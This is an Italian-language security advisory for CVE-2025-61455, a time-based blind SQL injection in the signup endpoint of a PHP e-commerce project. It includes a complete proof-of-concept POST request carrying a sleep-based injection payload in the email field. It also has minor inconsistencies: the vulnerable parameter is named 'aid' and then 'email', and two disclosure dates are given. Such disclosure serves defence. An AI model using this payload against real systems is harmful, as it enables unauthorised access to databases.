
Divulgazione pubblica e proof-of-concept per CVE-2025-61455, un'iniezione SQL critica in E-commerce Project v1.0, inclusi dettagli tecnici, PoC e raccomandazioni di mitigazione.
Data di divulgazione: 14 ottobre 2025
ID CVE: CVE-2025-61455
Gravità: CRITICA (CVSS 9.8)
Una vulnerabilità critica di SQL Injection esiste in E-commerce Project v1.0, in particolare nell'endpoint signup.inc.php. L'applicazione incorpora direttamente input utente non sanificati nelle query SQL, consentendo ad attaccanti non autenticati di bypassare l'autenticazione ed eseguire comandi SQL arbitrari.
A questo problema è stato assegnato l'identificatore CVE-2025-61455. Al momento della divulgazione pubblica, nessuna patch ufficiale era disponibile.
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.phpL'applicazione utilizza input non sanificati direttamente nelle query SQL senza alcuna validazione dell'input o prepared statement. La vulnerabilità esiste nel parametro aid del file signup.inc.php.
Un attaccante può iniettare codice SQL dannoso tramite il parametro email, consentendo attacchi di SQL injection blind basati sul tempo.
Esempio di pattern di codice vulnerabile:
$query = "SELECT * FROM table WHERE email='$email'";
Ciò consente payload di iniezione in grado di manipolare la logica delle query ed estrarre dati sensibili.
| ID CWE | Titolo |
|---|---|
| CWE-89 | Neutralizzazione impropria di elementi speciali utilizzati in un comando SQL |
| Punteggio | Gravità | Stringa del vettore |
|---|---|---|
| 9.8 | CRITICA | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Uno sfruttamento riuscito potrebbe comportare:
git clone https://github.com/Bhabishya-123/E-commerce.git
Utilizzare XAMPP/LAMP per distribuire il progetto e navigare su:
http://localhost/e-commerce-main/includes/signup.inc.php
Inviare la seguente richiesta HTTP dannosa:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
Spiegazione:
Il parametro email contiene un payload di SQL injection basato sul tempo: '+(select*from(select(sleep(20)))a)+'
Se l'applicazione ritarda la risposta di 20 secondi, l'iniezione SQL ha avuto successo.
mysqli_prepare() o PDO).| Evento | Data |
|---|---|
| Vulnerabilità scoperta | 16 settembre 2025 |
| Divulgazione pubblica | 13 ottobre 2025 |
| Patch disponibile | ❌ Non disponibile al momento della divulgazione |
Questa vulnerabilità è stata scoperta e divulgata in modo responsabile da:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 Questo advisory è pubblicato in modo indipendente a causa della mancanza di risposta da parte del vendor.